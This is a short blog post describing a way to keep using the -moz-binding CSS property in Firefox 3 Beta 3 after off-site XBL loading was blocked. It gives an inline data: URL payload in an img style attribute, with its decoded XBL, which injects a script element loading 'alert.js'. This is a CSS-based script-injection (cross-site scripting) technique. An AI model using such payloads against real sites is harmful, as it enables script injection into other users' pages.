Martin Paul Eve bio photo

Martin Paul Eve

Professor of Literature, Technology and Publishing at Birkbeck, University of London

Email Books Twitter Google+ Github Stackoverflow MLA CORE Institutional Repo Hypothes.is ORCID ID   ORCID iD

Email Updates

Well, I decided to play around a little with Firefox 3 Beta 3 today and discovered that it looks like the ever popular -moz-binding css attribute is now rendered a little less useful. It is now impossible to load off-site XBL via this method.

However, all is not lost. For in patching one of the biggest holes in Firefox's security model, the infinite wisdom of the FF devs is that it is now possible to embed a -moz-binding URL tag inline, like this:

<img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22
http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js
%22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20
document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/
binding%3E%3C/bindings%3E)" />

Using this method provides for no use of a fragment identifier, indeed it is only possible to use the first element. The above XBL decodes to:

<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl">
	<binding id="loader">
	<implementation>
		<constructor>
		
		var url = "alert.js";
		var scr = document.createElement("script");
		scr.setAttribute("src",url);
		var bodyElement = document.getElementsByTagName("html").item(0);
		bodyElement.appendChild(scr);CLOSE CDATA>
		</constructor>
	</implementation>
	</binding>
</bindings>

which essentially creates a nice new DOM script element that loads alert.js.